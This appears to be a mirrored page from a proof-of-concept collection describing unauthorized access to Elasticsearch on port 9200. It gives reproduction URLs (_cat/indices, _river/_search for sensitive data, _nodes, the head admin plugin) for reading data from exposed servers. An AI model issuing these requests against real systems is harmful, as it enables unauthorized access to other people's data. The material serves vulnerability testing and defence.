admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/server-application/Elasticsearch 未授权访问.md
Threekiii 762e66d4a7 update gitbook
2022-02-20 16:14:31 +08:00

535 B
Raw Blame History

Elasticsearch 未授权访问

漏洞描述

Elasticsearch是用Java开发的企业级搜索引擎默认端口9200存在未授权访问漏洞时可被非法操作数据

漏洞影响

Elasticsearch

漏洞复现

访问目标URL : http://xxx.xxx.xxx.xxx:9200/_node

http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes         //查看节点数据
http://localhost:9200/_plugin/head/  //web管理界面(head插件)